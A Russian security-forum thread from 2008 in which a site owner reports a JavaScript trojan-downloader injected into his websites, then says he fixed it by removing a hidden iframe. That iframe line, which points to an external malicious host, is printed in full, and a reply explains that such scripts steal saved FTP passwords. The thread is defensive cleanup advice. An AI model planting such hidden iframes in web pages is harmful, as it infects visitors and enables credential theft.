-
Junior Member
- Вес репутации
- 61
Trojan-Downloader.JS.Tabletka.a
Привет!
Знаю правила форума, но вирус не у меня на компе, а на сайте bonus-poker.ru - без касперского НЕ ЗАХОДИТЬ!!!. Каспер определил его как Trojan-Downloader.JS.Tabletka.a - пытается закачать файлы с разных серверов. Вирус совсем молодой, был зафиксирован лабораторией касперского 22-го октября кажется, еще нет ни описаний ничего. Отправил им письмо, пока разбираются.
В моем случае троян пытается качаться с сервера 0012.ff-freehosting.com/all/index.php//index
Также заразился другой сайт, который находится у этого же хостера.
Вот тут единственное, что нашел по этому поводу http://forum.kazandom.ru/index.php?s...0&#entry471414
В конце кода страницы был подозрительный чужлй php-код на открытие страницы, но такой страницы у себя на хосте я не нашел. Удаление кода также не решило проблему. Ваша лаборатория может справится с такой зверюшкой до официальных релизов?
Последний раз редактировалось V_Bond; 24.10.2008 в 21:03.
Причина: активные ссылки
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Спасибо за информацию, но увы свой лаборатории у нас нет
-
-
Junior Member
- Вес репутации
- 61
Решил проблему сам. В коде главных страниц обоих сайтов на этом хостере была найдена и удалена следующая строчка кода:
<iframe src="http://thefilmmusic.cn/in" width=393 height=14 style="visibility: hidden"></iframe>
Сменил пароли в панель и фтп-вход. После этого касперский перестал обнаруживать вирус.
-
Paradox, тему я перенёс. Больше в "помогите" такое не постить, иначе красную карточку подарю.
-
-
Paradox, история стара как мир, данный скрипт пытается качать кучу разных эксплойтов, большинство из них заточены на хищение сохраненных паролей из разного рода файл и фтп менеджеров. так что проверять внимательно все компы с которых заходили в админку сайта. т.к. утечка произошла с них. и не факт что это не повторится.
ЗЫ перестанте сохранять пароли в менеджерах, скуолько можно уже...